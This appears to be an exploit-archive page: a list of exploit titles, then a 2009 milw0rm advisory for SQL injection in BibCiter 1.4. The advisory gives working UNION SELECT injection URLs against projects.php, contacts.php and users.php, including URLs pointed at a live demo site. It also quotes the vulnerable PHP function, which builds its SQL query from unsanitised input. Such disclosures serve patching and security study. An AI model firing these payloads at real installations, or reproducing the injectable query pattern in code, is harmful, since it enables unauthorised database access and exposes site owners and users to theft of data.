
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
50 lines
1.5 KiB
Text
Executable file
50 lines
1.5 KiB
Text
Executable file
#BibCiter 1.4 Multiple SQL Injection Vulnerability
|
|
|
|
|
|
#Author: nuclear
|
|
|
|
|
|
#site:
|
|
http://bibciter.sourceforge.net/
|
|
|
|
|
|
#vuln:
|
|
http://localhost/[path]/projects.php?idp=-721) UNION SELECT @@version%23
|
|
http://localhost/[path]/contacts.php?idc=-1) UNION SELECT @@version%23
|
|
http://localhost/[path]/users.php?idu=-1) UNION SELECT @@version%23
|
|
|
|
|
|
#demo:
|
|
http://bibciter.net/demo/reports/projects.php?idp=-721)%20UNION%20SELECT%20@@version%23
|
|
http://bibciter.net/demo/reports/contacts.php?idc=-1)%20UNION%20SELECT%20@@version%23
|
|
http://bibciter.net/demo/reports/users.php?idu=-1)%20UNION%20SELECT%20@@version%23
|
|
|
|
|
|
#notes:
|
|
watch the title for your query results ^^
|
|
|
|
|
|
#description:
|
|
vulnerable function:
|
|
|
|
function get_vatitle($idregister,$idregistervalue,$nameregister,$tableregister,$pretitle) {
|
|
$vartitle = "SELECT $nameregister FROM $tableregister WHERE ($idregister=$idregistervalue)";
|
|
$vartitle = mysql_query($vartitle) or die("error functions_queries line 4");
|
|
$vartitle = mysql_fetch_array($vartitle);
|
|
extract($vartitle);
|
|
$title = $pretitle." » ".$$nameregister;
|
|
return $title;
|
|
}
|
|
|
|
called in these files:
|
|
projects.php;contacts.php;users.php;types_authors.php;bibliographies.php;types_projects.php;
|
|
types_languages.php;types_countries.php;
|
|
|
|
|
|
#Special Greets to my bro Mi4night.. ur always the best
|
|
|
|
|
|
#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
|
|
|
|
|
|
# milw0rm.com [2009-01-16]
|